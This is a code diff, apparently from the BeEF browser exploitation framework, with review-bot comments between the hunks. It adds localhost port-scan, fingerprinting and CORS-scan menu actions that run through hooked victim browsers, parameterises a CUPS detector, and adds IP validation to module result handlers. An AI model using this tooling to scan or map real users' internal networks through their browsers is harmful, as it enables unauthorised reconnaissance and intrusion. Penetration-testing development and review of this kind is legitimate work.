diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index a91e2c937..3cffc24d9 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -351,6 +351,12 @@ module BeEF
 # log a few info of newly hooked zombie in the console
 print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
+ # add localhost as network host
+ if config.get('beef.extension.network.enable')
+ print_debug("Hooked browser has network interface 127.0.0.1")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => '127.0.0.1', :hostname => 'localhost', :os => BeEF::Core::Models::BrowserDetails.get(session_id, 'OsName'), :cid => 'init')
+ r.save
+ end
 # Call autorun modules
 if config.get('beef.autorun.enable')
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
index dfd9e4bf3..9dd47a21c 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
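Review bot: The return value of `r.save` in the added block of browserdetails.rb is discarded, so a failed insert of the localhost row goes unnoticed; `:cid => 'init'` is a string, whereas the module hunks in this commit that show the assignment pass `@datastore['cid'].to_i`, so it is worth confirming the column accepts it (the model is not shown). `os_name` is already in scope on the `print_info` line directly above, so `:os => os_name` would avoid the extra `BrowserDetails.get(session_id, 'OsName')` lookup, assuming both hold the same value. A one-line comment saying why every hooked browser gets a 127.0.0.1 entry (it appears to give the Network tab a row for the localhost menu added in the JS hunk) would help the next reader. The enclosing method starts and ends outside the hunk.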
@@ -351,7 +351,159 @@ ZombieTab_Network = function(zombie) {
 var ip = record.get('ip');
 var class_c = ip.split(".")[0]+"."+ip.split(".")[1]+"."+ip.split(".")[2];
 var ip_range = class_c+'.1-'+class_c+'.255';
- grid.rowCtxMenu = new Ext.menu.Menu({
+ // menu options for localhost
+ if (class_c == '127.0.0') {
+ grid.rowCtxMenu = new Ext.menu.Menu({
+ items: [
+ {
+ text: 'Discover Web Servers',
+ iconCls: 'network-host-ctxMenu-web',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Host ('+ip+')',
+ iconCls: 'network-host-ctxMenu-host',
+ handler: function() {
+ var mod_id = get_module_id("get_http_servers");
+ commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip+'-'+ip}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'Fingerprint HTTP',
+ iconCls: 'network-host-ctxMenu-fingerprint',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Host ('+ip+')',
+ iconCls: 'network-host-ctxMenu-host',
+ handler: function() {
+ var mod_id = get_module_id("internal_network_fingerprinting");
+ commands_statusbar.update_sending('Fingerprinting ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip+'-'+ip}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'CORS Scan',
+ iconCls: 'network-host-ctxMenu-cors',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Host ('+ip+')',
+ iconCls: 'network-host-ctxMenu-host',
+ handler: function() {
+ var mod_id = get_module_id("cross_origin_scanner");
+ commands_statusbar.update_sending('CORS scanning ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip+'-'+ip}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'Port Scan',
+ iconCls: 'network-host-ctxMenu-network',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Common Ports',
+ iconCls: 'network-host-ctxMenu-host',
+ handler: function() {
+ var mod_id = get_module_id("port_scanner");
+ var ports = '21,22,23,25,80,81,443,445,1080,8080,8081,8090,8443,3000,3128,3389,3306,5432,6379,10000,10443';
+ commands_statusbar.update_sending('Port scanning ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipHost":ip,"ports":ports}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Specify Ports',
+ iconCls: 'network-host-ctxMenu-config',
+ handler: function() {
+ var mod_id = get_module_id("port_scanner");
+ var ports = prompt("Enter ports to scan:", '1,5,7,9,15,20,21,22,23,25,26,29,33,37,42,43,53,67,68,69,70,76,79,80,88,90,98,101,106,109,110,111,113,114,115,118,119,123,129,132,133,135,136,137,138,139,143,144,156,158,161,162,168,174,177,194,197,209,213,217,219,220,223,264,315,316,346,353,389,413,414,415,416,440,443,444,445,453,454,456,457,458,462,464,465,466,480,486,497,500,501,516,518,522,523,524,525,526,533,535,538,540,541,542,543,544,545,546,547,556,557,560,561,563,564,625,626,631,636,637,660,664,666,683,740,741,742,744,747,748,749,750,751,752,753,754,758,760,761,762,763,764,765,767,771,773,774,775,776,780,781,782,783,786,787,799,800,801,808,871,873,888,898,901,953,989,990,992,993,994,995,996,997,998,999,1000,1002,1008,1023,1024,1080,8080,8443,8050,3306,5432,1521,1433,3389,10088');
+ if (!ports) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ commands_statusbar.update_sending('Port scanning ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipHost":ip,"ports":ports}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ }]
+ }
+ }]
+ });
+ // menu options for all hosts other than 127.0.0.x
+ } else {
+ grid.rowCtxMenu = new Ext.menu.Menu({
 items: [
 {
 text: 'Discover Web Servers',
@@ -564,7 +716,8 @@ ZombieTab_Network = function(zombie) {
 }]
 }
 }]
- });
+ });
+ }
 grid.rowCtxMenu.showAt(e.getXY());
 },
 afterrender: function(datagrid) {
diff --git a/modules/exploits/router/asus_rt_series_get_info/module.rb b/modules/exploits/router/asus_rt_series_get_info/module.rb
index d3e58601b..5b729ce06 100644
--- a/modules/exploits/router/asus_rt_series_get_info/module.rb
+++ b/modules/exploits/router/asus_rt_series_get_info/module.rb
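Review bot: The five handlers added for the 127.0.0.x menu in ZombieTabNetwork.js repeat one `$jwterm.ajax` call and differ only in the module name, the JSON payload and the status-bar text, and the `else` branch keeps a further copy for all other hosts. Extracting a single local function that takes those three values would reduce this hunk to a menu definition and keep any later change to the request (for example the synchronous `async: false`, or the API token carried in the query string, where it can end up in server and proxy logs) in one place. In 'Specify Ports' the string returned by `prompt` is sent as `ports` after only an emptiness check; a digits-and-separators format check before the POST would catch typos early, with server-side validation in the module remaining the authority. The enclosing listener starts above the hunk.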
@@ -29,7 +29,7 @@ class Asus_rt_series_get_info < BeEF::Core::Command
 gateway = "#{$5}"
 dns_servers = "#{$6}"
- if !ip.nil?
+ if !ip.nil? && BeEF::Filters.is_valid_ip?(ip)
 print_debug("Hooked browser found Asus RT series router [ip: #{ip}]")
 r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :type => 'Asus Router', :cid => cid)
 r.save
@@ -41,21 +41,25 @@ class Asus_rt_series_get_info < BeEF::Core::Command
 if client.to_s =~ /^([\d\.]+),([:\dA-F]{17})$/
 ip = $1
 mac = $2
- print_debug("Hooked browser found router client [ip: #{ip}, mac: #{mac}]")
- r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :mac => mac, :cid => cid)
- r.save
+ if BeEF::Filters.is_valid_ip?(ip)
+ print_debug("Hooked browser found router client [ip: #{ip}, mac: #{mac}]")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :mac => mac, :cid => cid)
+ r.save
+ end
 end
 end
- if !gateway.nil?
+ if !gateway.nil? && BeEF::Filters.is_valid_ip?(gateway)
 print_debug("Hooked browser found WAN gateway server [ip: #{gateway}]")
 r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => gateway, :type => 'WAN Gateway', :cid => cid)
 r.save
 end
 if !dns_servers.nil? && dns_servers =~ /^([\d\. ]+)$/
 dns_servers.split(/ /).uniq.each do |dns|
- print_debug("Hooked browser found DNS server [ip: #{dns}]")
- r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => dns, :type => 'DNS Server', :cid => cid)
- r.save
+ if BeEF::Filters.is_valid_ip?(dns)
+ print_debug("Hooked browser found DNS server [ip: #{dns}]")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => dns, :type => 'DNS Server', :cid => cid)
+ r.save
+ end
 end
 end
 end
diff --git a/modules/host/detect_cups/command.js b/modules/host/detect_cups/command.js
index b2d19317b..5974c9718 100644
--- a/modules/host/detect_cups/command.js
+++ b/modules/host/detect_cups/command.js
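Review bot: In the first asus_rt_series_get_info hunk, `!ip.nil?` adds nothing to the new condition if `ip` is built like the two context lines above it (`gateway = "#{$5}"`, `dns_servers = "#{$6}"`), because interpolation always yields a String; the assignment of `ip` is above the hunk, so this is inferred for `ip` but visible for `!gateway.nil?` in the next hunk. `BeEF::Filters.is_valid_ip?` is therefore the only effective guard, and the nil tests can go. A value that fails the filter is dropped without any trace here and in the other `is_valid_ip?` hunks of this commit (detect_cups, get_internal_ip_webrtc, cross_origin_scanner, get_http_servers, identify_lan_subnets, internal_network_fingerprinting, jslanscanner, ping_sweep, port_scanner); an `else` branch with `print_debug("Ignoring invalid IP address in module result: #{ip.inspect}")` would make malformed reports from a hooked browser visible.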
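Review bot: In the second asus_rt_series_get_info hunk, the context guard `dns_servers =~ /^([\d\. ]+)$/` is anchored per line, so for a multi-line value a single matching line is enough, while `dns_servers.split(/ /)` then walks the whole string. The added per-token `BeEF::Filters.is_valid_ip?(dns)` is what actually constrains the stored value (the filter's own anchoring is not shown here). Using `\A([\d\. ]+)\z` would make the pre-check cover the full string; the same applies to `client.to_s =~ /^([\d\.]+),([:\dA-F]{17})$/`, so that a client entry is accepted only when it is the whole value.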
@@ -9,14 +9,14 @@ beef.execute(function() {
 var result = "Not Installed";
 var dom = document.createElement('b');
 var img = new Image;
- img.src = "http://127.0.0.1:631/images/cups-icon.png";
+ img.src = "http://<%= @ipHost %>:<%= @port %>/images/cups-icon.png";
 img.onload = function() {
 if (this.width == 128 && this.height == 128) result="Installed";
- beef.net.send('<%= @command_url %>', <%= @command_id %>,'cups='+result);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto=http&ip=<%= @ipHost %>&port=<%= @port %>&cups='+result);
 dom.removeChild(this);
 }
 img.onerror = function() {
- beef.net.send('<%= @command_url %>', <%= @command_id %>,'cups='+result);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto=http&ip=<%= @ipHost %>&port=<%= @port %>&cups='+result);
 dom.removeChild(this);
 }
 dom.appendChild(img);
diff --git a/modules/host/detect_cups/module.rb b/modules/host/detect_cups/module.rb
index 6a5d3116b..bb5bf4303 100644
--- a/modules/host/detect_cups/module.rb
+++ b/modules/host/detect_cups/module.rb
@@ -5,9 +5,32 @@
 #
 class Detect_cups < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'ipHost', 'ui_label' => 'IP or Hostname', 'value' => '127.0.0.1'},
+ {'name' => 'port' , 'ui_label' => 'Port', 'value' => '631'}
+ ]
+ end
 def post_execute
 save({'CUPS' => @datastore['cups']})
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+ if @datastore['results'] =~ /^proto=(https?)&ip=([\d\.]+)&port=([\d]+)&cups=Installed$/
+ proto = $1
+ ip = $2
+ port = $3
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+ if BeEF::Filters.is_valid_ip?(ip)
+ print_debug("Hooked browser found 'CUPS' [proto: #{proto}, ip: #{ip}, port: #{port}]")
+ r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => 'CUPS', :cid => cid)
+ r.save
+ end
+ end
+ end
 end
 end
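Review bot: In detect_cups/command.js, `<%= @ipHost %>` and `<%= @port %>` are substituted straight into a JavaScript string literal and a URL, and nothing in this commit validates or escapes them first, so a value containing a quote, a slash or `&` changes the generated script, the request target or the `proto=…&ip=…&port=…` result string. The values are operator-supplied options, but the module.rb hunk only checks what comes back from the browser, not what goes into the template. Validate both in the module before the template is rendered (host-name or address characters only for `ipHost`, an integer from 1 to 65535 for `port`).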
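Review bot: In detect_cups/module.rb the option is labelled 'IP or Hostname', yet a result is recorded only when it matches `ip=([\d\.]+)` and passes `BeEF::Filters.is_valid_ip?`, so a run against a host name still reaches `save({'CUPS' => …})` but never creates the NetworkService row. Either label the option 'IP' or handle host names explicitly. The pattern is anchored with `^`/`$`, which match per line in Ruby; `\A`/`\z` anchor the whole string, and `port` is captured as `[\d]+` without a range check. `== true` here also differs from the plain truthiness test of the same setting in browserdetails.rb.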
diff --git a/modules/host/get_internal_ip_webrtc/module.rb b/modules/host/get_internal_ip_webrtc/module.rb
index 7d497d1b7..9c516e87f 100755
--- a/modules/host/get_internal_ip_webrtc/module.rb
+++ b/modules/host/get_internal_ip_webrtc/module.rb
@@ -24,6 +24,7 @@ class Get_internal_ip_webrtc < BeEF::Core::Command
 ips.uniq.each do |ip|
 next unless ip =~ /^[\d\.]+$/
 next if ip =~ /^0\.0\.0\.0$/
+ next unless BeEF::Filters.is_valid_ip?(ip)
 print_debug("Hooked browser has network interface #{ip}")
 r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :os => os, :cid => cid)
 r.save
diff --git a/modules/network/cross_origin_scanner/module.rb b/modules/network/cross_origin_scanner/module.rb
index 4a080bc21..dc7804ddb 100644
--- a/modules/network/cross_origin_scanner/module.rb
+++ b/modules/network/cross_origin_scanner/module.rb
@@ -21,7 +21,7 @@ class Cross_origin_scanner < BeEF::Core::Command
 ip = $1
 port = $2
 print_debug("Hooked browser found HTTP server #{ip}:#{port}")
- if !ip.nil? && !port.nil?
+ if !ip.nil? && !port.nil? && BeEF::Filters.is_valid_ip?(ip)
 r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => 'HTTP Server (CORS)', :cid => cid)
 r.save
 end
diff --git a/modules/network/get_http_servers/module.rb b/modules/network/get_http_servers/module.rb
index 4afcd1d01..31c5846ed 100644
--- a/modules/network/get_http_servers/module.rb
+++ b/modules/network/get_http_servers/module.rb
@@ -33,7 +33,7 @@ class Get_http_servers < BeEF::Core::Command
 url = $4
 session_id = @datastore['beefhook']
 cid = @datastore['cid'].to_i
- if !ip.nil?
+ if !ip.nil? && BeEF::Filters.is_valid_ip?(ip)
 print_debug("Hooked browser found HTTP Server [proto: #{proto}, ip: #{ip}, port: #{port}]")
 r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => "HTTP Server", :cid => cid)
 r.save
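Review bot: In cross_origin_scanner/module.rb the context line `print_debug("Hooked browser found HTTP server #{ip}:#{port}")` still runs before the new `is_valid_ip?` test, so an address the filter rejects is nevertheless announced as a found server in the debug output. Moving that `print_debug` inside the `if`, as the get_http_servers hunk that follows already has it, keeps the log consistent with what is stored. `port` is only nil-checked in this condition; its pattern is above the hunk, so whether it is range-checked cannot be seen here.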
diff --git a/modules/network/identify_lan_subnets/module.rb b/modules/network/identify_lan_subnets/module.rb
index 51aa7ca93..436950477 100644
--- a/modules/network/identify_lan_subnets/module.rb
+++ b/modules/network/identify_lan_subnets/module.rb
@@ -36,6 +36,7 @@ class Identify_lan_subnets < BeEF::Core::Command
 hosts.split(',').flatten.each do |ip|
 next if ip.nil?
 next unless ip.to_s =~ /^([\d\.]+)$/
+ next unless BeEF::Filters.is_valid_ip?(ip)
 print_debug("Hooked browser found host #{ip}")
 r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
 r.save
diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js
index 0eff974dc..6cf576603 100644
--- a/modules/network/internal_network_fingerprinting/command.js
+++ b/modules/network/internal_network_fingerprinting/command.js
@@ -88,6 +88,10 @@ beef.execute(function() {
 "Microsoft IIS",
 "80","http",false,
 "/pagerror.gif",36,48),
+ new Array(
+ "PHP",
+ "80","http",false,
+ "/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42",120,67),
 new Array(
 "QNAP NAS",
 "8080","http",false,
@@ -97,9 +101,13 @@ beef.execute(function() {
 "443","https",false,
 "/cgi-bin/images/login/cloud_portal.png",165,32),
 new Array(
- "Asus Router",
+ "Asus RT Series Router",
 "80","http",false,
 "/images/top-02.gif",359,78),
+ new Array(
+ "Asus RX Series Router",
+ "80","http",false,
+ "/images/bu_blue.gif",82,16),
 new Array(
 "Belkin Router",
 "80","http",false,
diff --git a/modules/network/internal_network_fingerprinting/module.rb b/modules/network/internal_network_fingerprinting/module.rb
index cb928e86f..2a3086307 100644
--- a/modules/network/internal_network_fingerprinting/module.rb
+++ b/modules/network/internal_network_fingerprinting/module.rb
@@ -35,7 +35,7 @@ class Internal_network_fingerprinting < BeEF::Core::Command
 url = $5
 session_id = @datastore['beefhook']
 cid = @datastore['cid'].to_i
- if !ip.nil?
+ if !ip.nil? && BeEF::Filters.is_valid_ip?(ip)
 print_debug("Hooked browser found '#{discovered}' [ip: #{ip}]")
 r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => discovered, :cid => cid)
 r.save
diff --git a/modules/network/jslanscanner/command.js b/modules/network/jslanscanner/command.js
index a20f5a529..45ef3f56a 100644
--- a/modules/network/jslanscanner/command.js
+++ b/modules/network/jslanscanner/command.js
@@ -220,6 +220,7 @@ beef.execute(function() {
 {make:'SMC',model:'7004ABR',graphic:'/images/logo.gif'},
 {make:'DLink',model:'DI524',graphic:'/m524.gif'},
 {make:'Cisco',model:'2600',graphic:'/images/logo.png'},
+ {make:'ASUS',model:'RX Series',graphic:'/images/banner_sys4bg.gif'},
 {make:'ASUS',model:'RT Series',graphic:'/images/EZSetup_button.gif'}
 ];
diff --git a/modules/network/jslanscanner/module.rb b/modules/network/jslanscanner/module.rb
index 0352c31ae..daa0a851a 100644
--- a/modules/network/jslanscanner/module.rb
+++ b/modules/network/jslanscanner/module.rb
@@ -35,7 +35,7 @@ class Fingerprint_routers < BeEF::Core::Command
 device = $2
 session_id = @datastore['beefhook']
 cid = @datastore['cid'].to_i
- if !ip.nil?
+ if !ip.nil? && BeEF::Filters.is_valid_ip?(ip)
 print_debug("Hooked browser found network device " + device + " [ip: #{ip}]")
 r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :type => device, :cid => cid)
 r.save
diff --git a/modules/network/ping_sweep/module.rb b/modules/network/ping_sweep/module.rb
index 4081ff2f8..b99ef8a6e 100644
--- a/modules/network/ping_sweep/module.rb
+++ b/modules/network/ping_sweep/module.rb
@@ -36,9 +36,11 @@ class Ping_sweep < BeEF::Core::Command
 # save the network host
 if @datastore['results'] =~ /host=([\d\.]+) is alive/
 ip = $1
- print_debug("Hooked browser has network interface #{ip}")
- r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
- r.save
+ if BeEF::Filters.is_valid_ip?(ip)
+ print_debug("Hooked browser has network interface #{ip}")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
+ r.save
+ end
 end
 end
diff --git a/modules/network/port_scanner/module.rb b/modules/network/port_scanner/module.rb
index afb9c18b1..35d13dd67 100644
--- a/modules/network/port_scanner/module.rb
+++ b/modules/network/port_scanner/module.rb
@@ -38,7 +38,7 @@ class Port_scanner < BeEF::Core::Command
 service = $4
 session_id = @datastore['beefhook']
 cid = @datastore['cid'].to_i
- if !ip.nil?
+ if !ip.nil? && BeEF::Filters.is_valid_ip?(ip)
 print_debug("Hooked browser found network service [ip: #{ip}, port: #{port}]")
 r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => service, :cid => cid)
 r.save